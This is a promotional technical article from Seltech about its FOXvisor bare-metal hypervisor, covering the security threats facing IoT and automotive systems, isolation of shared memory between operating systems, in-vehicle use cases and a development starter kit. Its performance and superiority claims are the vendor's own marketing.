FOXvisor – Virtualization Solution in Secure Automotive Systems

Security in Networked Systems

The networking market is reality, and it is growing enormously in many applications such as automotive, consumer electronics, and industry systems. Applications like connected cars, advanced driver information systems, Internet of Things (IoT), Industry 4.0, Deep Learning, Energy, Medical & Health Care, Imaging, and Smart Home are growing rapidly. However, threats are growing just as fast. Risks like hacking, viruses, malware, and reverse engineering jeopardize the benefits of those technologies. The demand for security is therefore inherent when designing a system. The consequences of security violation might even have severe impact on companies, vendors, and users alike. While infringement stretches from information leakages to illegal operation, which in the worst case might result in death through accidents or even murder, the related impact on the business of a company reaches from recall handling to compensation for damages, with potential brand image damage, and difficulties in company management as a consequence. Countermeasures are therefore taken, and already in 2015 the worldwide security market was on the order of $76,000,000,000, and it is growing at least as constantly as the number of implementations grow. The applications are by no means safe, as detailed investigations on many different IoT devices have shown. Thorough research was done by a team of scientists from Yokohama National University, Japan, in cooperation with other international universities. The number of infringements trials during the 122 days’ test period into simple IoT devices like LED display control systems, fire alarms, routers, security appliance, TV receivers was in the order of one million trials. This proves how immense the threat is.

The general flow of net based attacks is simple. With dictionary attacks, login attempts are started, followed by a series of telephone net commands. When successful, malware is downloaded, and actions like information uploads are started, and the user or operator is a victim. Just as effective are downloads of viruses and malware from contaminated external devices that are connected to e.g. automotive or IoT devices.

Security, however, not only has to be very safe and effective, in most systems for consumer use it must also be almost cost neutral. A prohibitive task, you would think, as most of those systems and applications cannot afford expensive, powerful processors for their protection. As such, other solutions to cost effectively and securely safeguard systems have to be found.

Which options exist for cost competitive high security? There are two basic ways to implement security: software and hardware based solutions.

Let us take a look at pure software based solutions. A new virus or malware has been developed that breaches existing software security. As result, an anti-virus is developed, followed by a new virus. A never ending cycle. Additionally, unintentional user admittance is a weak spot. The user virtually opens the door for the virus, which then might be re-distributed, and an increasing number of systems get infected. Malware might also intrude through ill use of software update mechanisms or by taking over the administrator rights. There are many methods of intrusion into software systems, which leads to the conclusion that there are no secure software based security systems: they are inherently bound to be broken. As a matter of fact, the best path to secure system integrity are hardware based solutions.

CPU IP (Intellectual Property) core providers offer secure environment methodologies for SoC (System on Chip) systems based on these cores. Three major vendors for CPUs – ARM, MIPS, and Intel – have implemented their own security approaches. ARM (TZ, Trust Zone) and MIPS (VZ, Virtualization Zone) use an embedded CPU for their implementations. Intel (VT/VT1, Virtualization Technology)) mainly uses servers. A hypervisor or virtual machine monitor (VMM) is computer software, firmware, or hardware that creates and runs virtual machines, creating a Trusted Execution Environment (TEE). Those hypervisors or virtual machines that run right on the host’s secure hardware areas like ARM’s Trust Zone or MIPS’ VZ to control the hardware and to manage the guest operating system are called bare metal hypervisors. The embedded virtualization modules add a guest mode, which leaves the root or user mode in full control of what the guest operating system is permitted to do. The guest OS remains unchanged and without realizing its virtualization. While the secure hardware is part of the IP, the secure OS comes from a trusted third party vendor.

Virtual Machine or Hypervisor

Seltech presents FOXvisor. Seltech is a Tokyo based vendor of security solutions for IoT, automotive, and consumer electronics products that protect systems from cyber-attack. The company offers unique virtualization technology and solutions which combine voice/visual recognition and artificial intelligence for applications. FOXvisor is a bare metal hypervisor, and as such offers the highest possible security, and most efficient use of CPU power, with usage of only 1% of the CPU power. FOXvisor minimizes the risk of unauthorized access by mapping designated secure data on the OS, with no need to modify the source code of the Rich OS. At only 32 KB, FOXvisor is the world’s smallest footprint hypervisor. FOXvisor is recognized as having the best performance bare metal virtualization system from major CPU core IP vendors. It supports architectures like ARM, MIPS, Intel, NVidia and others, and creates Trusted Execution Environments.

Systems use shared memory to write data to all involved operating systems (OSs), both secure and non-secure. Since it is therefore easy for the data to be seen, this implies potential vulnerability. Even more attention is required when shared memory is provided for OSs like Linux and Android. Systems using these OSs are often composed of an unspecified number of applications, and end users are even authorized to add applications. It means that new applications, which system designers and administrators cannot consider in advance, may access the shared memory. However, under the circumstance where security is more important than execution efficiency, in some cases a data copying process can be used. By placing shared memory in the memory area of the OS that you want to isolate for security reasons, the effects of unauthorized access are minimized. FOXvisor offers this option. Normally, FOXvisor would prepare the shared memory area in an area accessible from all OSs. To avoid this situation, FOXvisor creates a secure, isolated shared memory area in the memory area of the OS. Figure 2 shows an example of creating a shared memory area when using Linux. In this configuration, the other OS or FOXvisor reads and writes the memory area of Linux set to non- secure mode, and the OS that accesses shared memory is limited only to the OS that communicates with Linux. Even if an unauthorized application tries to access and capture the shared memory, its impact will be limited. Therefore, if security is more important than execution efficiency, the shared memory needs to be configured using this method, ideally fast, no major overhead to the processor, and with small footprint.

The development of a virtualization machine from companies’ own development teams is not an easy task, and it is associated with a variety of difficulties. Developing with a hypervisor means that two OS are running in parallel. For development with a Rich OS, like LINUX, software engineers need expertise in RTOS also, while RTOS engineers need expertise in development with a Rich OS. The complexity is enormous. The major challenge, however, is to be sure that the designed hypervisor is working securely. A system’s performance requirements need to be met, whereas the original OS code may not be touched, as the OS vendor will stop any support once the OS gets modified. The virtualization system has to run on each and every new release of the OS software, which means that maintenance for the latest OS versions is not trivial. To avoid technical support issues from the OS vendor, OS vendors lock-in is useful. However, this increases development costs, while support in progress could be slow, due to slow reply and poor communication. The re-usability of past software developments might also be limited. Even after completion of the hypervisor porting, the security software might not be compliant with the existing environment. Firmware and other updates also add complexity to hypervisor development.

FOXvisor was already developed and verified in 2012, and soon ported to automotive and other systems. Business alliances with major CPU, GPU, and DSP manufacturers were contracted. This guarantees achievements by entrusted development for brand manufactures.

A hypervisor allows the co-existence of Rich OS & RTOS. Time critical and often security or safety critical applications are recognized as such and run prioritized to the Rich OS applications.

Automotive Use Cases

Automotive use cases for FOXvisor include instant start-up applications for in-vehicle devices like back cameras, music play, and even the company logo on the infotainment display or on controls and instruments. It operates instant start-up applications that cannot be implemented by snapshot on Rich OS, as if they are Rich OS applications, while leaving them on the existing RTOS. For example, the map and audio applications during start-up run on the RTOS. The underlying process is that hypervisor blends the RTOS applications with Rich OS applications on to the Rich OS, to make them look like Rich OS applications (Figure 3).

While both examples showed the importance of running RTOS applications without being affected by influences from the Rich OS, Figure 5 shows a security aspect in the use of a hypervisor system. Portable navigation systems, for example, infected by a virus and shipped to the after markets, and even software or firmware updates to in-car systems, are a major threat for infection, through which attacks on a vehicle’s control system could be executed. Virus infection, hacking, remote control of devices or functions that connect to navigation in the vehicle may result in serious accidents, which is easy to virtualize if, for example, driver safety devices such as the breaker, handle and meter get invaded. Security can be ensured by introduction of a secure domain, through means of encryption keys, CAN bus controlled updating, and the personal information management is handled.

Development with FOXvisor is supported by a comprehensive starter kit: A FOXvisor virtualization machine integrated on a NXP i.MX6 SABRE AI evaluation board, a Linux NXP BSP or a μITRON eForce μC3 operating system, coming with a 1-day course training, including a Hypervisor overview, and lectures on software/application development on FOXvisor.

Conclusion

Pure software based solutions to protect networked systems are by no means secure. A highly secure and effective alternative is hardware based systems, like bare-metal Hypervisors. Recognized as the world’s best performance Hypervisor by the major CPU core IP vendors, FOXvisor is the world’s fastest, lightest, quickest to port virtualization system, with multiple use-cases in the automotive environment. It supports real time implementations like start-up applications, real-time and failure critical systems, and protects safety relevant systems from malware attacks. FOXvisor offers a complete design environment, and respective support.

"foxvisor_Fig1_seltech"

Figure 1: FOXvisor smallest footprint bare metal highly secure hypervisor Figure 2: Shared memory with TrustZone disabled and enabled

"foxvisor_Fig3_seltech"

Figure 3: Hypervisor blends RTOS applications with Rich OS applications on Rich OS to make them look like Rich OS applications

"foxvisor_Fig4_seltech"

Figure 4: Metering application. Safety critical applications run while non-critical applications reboot Figure 5: Security in Car Navigation Systems

Seltech Corporation Profile

Seltech provides security for IoT devices with its unique virtualization technology and solutions which combine voice/vision recognitions and artificial intelligence for applications. The solutions protect Automotive, Consumer Electronics products and IoT devices from Cyber-attacks. Seltech was founded 2009 in Tokyo, Japan. The company is represented in Europe from ViMOS Technologies GmbH, Taufkirchen. Further information is available at www.seltech.co.jp